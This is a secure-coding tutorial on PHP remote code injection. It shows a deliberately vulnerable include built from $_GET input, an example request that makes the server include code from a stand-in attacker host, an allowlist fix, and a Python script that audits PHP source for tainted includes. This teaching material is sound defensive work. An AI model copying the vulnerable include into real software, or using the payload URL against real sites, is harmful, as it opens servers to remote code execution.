Remote Code Injection

A remote code injection attack occurs when an attacker is able to cause your application to execute PHP code of their choosing. The defences are to never use tainted data in an include or require statement and to set allow_url_fopen = 0.

<?php
    // URL wrappers enabled (normally a php.ini setting): the precondition for the remote include below
    ini_set("allow_url_fopen", 1);
    // Tainted request data goes straight into the include path
    include "{$_GET['section']}/data.inc.php";

    // http://example.org/?section=news
        // include "news/data.inc.php";

    // http://example.org/?section=http%3A%2F%2Fevil.example.org%2Fattack.inc%3F
        // include "http://evil.example.org/attack.inc?data.inc.php";

Protecting against it is straightforward: filter all input and never use tainted data in an include or require statement. By default, allow_url_fopen is set to On.

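<?php
    $clean = array();
    // Allowlist of the only sections that may be included
    $sections = array('home', 'news', 'photos', 'blog');
    // Strict comparison; a missing or non-string parameter falls through to the default
    if (isset($_GET['section']) && in_array($_GET['section'], $sections, true)) {
        $clean['section'] = $_GET['section'];
    } else {
        $clean['section'] = 'home';
    }
    // Only the validated value reaches include
    include "{$clean['section']}/data.inc.php";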
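
An added example, not part of the original page: a first-pass audit script in Python that scans PHP source for include/require statements fed directly by a request superglobal, or by a plain variable assigned straight from one. It is regex-based and does not model validation, so every hit needs review and an empty result is not proof of safety. The function names and the sample snippets are constructed for this illustration.

```python
import re

# Request-controlled PHP superglobals: anything read from these is tainted.
SUPERGLOBAL = r"\$_(?:GET|POST|REQUEST|COOKIE|FILES|SERVER)\b"
# Strings are matched first so "//" inside a URL literal is not read as a comment.
LITERAL_OR_COMMENT = re.compile(
    r"""(?P<str>"(?:\\.|[^"\\])*"|'(?:\\.|[^'\\])*')"""
    r"""|(?P<com>//[^\n]*|#[^\n]*|/\*.*?\*/)""", re.S)
INCLUDE = re.compile(r"\b(?:include|require)(?:_once)?\b[^;]*;", re.I)
ASSIGN = re.compile(r"(\$[A-Za-z_]\w*)\s*=(?![=>])\s*([^;]*);")

def blank_comments(src):
    """Replace comments with spaces, keeping newlines so line numbers survive."""
    def repl(m):
        return m.group(0) if m.group("str") else re.sub(r"[^\n]", " ", m.group(0))
    return LITERAL_OR_COMMENT.sub(repl, src)

def find_tainted_includes(src):
    """Return (line, statement) for each include/require fed by request data."""
    code = blank_comments(src)
    # One-hop propagation: plain variables assigned straight from a superglobal.
    tainted = [re.escape(m.group(1)) + r"\b" for m in ASSIGN.finditer(code)
               if re.search(SUPERGLOBAL, m.group(2))]
    taint = re.compile("|".join([SUPERGLOBAL] + tainted))
    findings = []
    for m in INCLUDE.finditer(code):
        if taint.search(m.group(0)):
            line = code.count("\n", 0, m.start()) + 1
            findings.append((line, " ".join(m.group(0).split())))
    return findings

# Constructed samples modelled on the two PHP snippets above.
VULNERABLE = '''<?php
    include "{$_GET['section']}/data.inc.php";
    // include "news/data.inc.php";
'''
INDIRECT = '''<?php
$page = $_REQUEST['page'];  # one hop through a plain variable
require_once $page . ".php";
'''
ALLOWLISTED = '''<?php
    $sections = array('home', 'news', 'photos', 'blog');
    $clean['section'] = in_array($_GET['section'], $sections, true)
        ? $_GET['section'] : 'home';
    include "{$clean['section']}/data.inc.php";
'''

for name in ("VULNERABLE", "INDIRECT", "ALLOWLISTED"):
    print(name, find_tainted_includes(globals()[name]))
```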

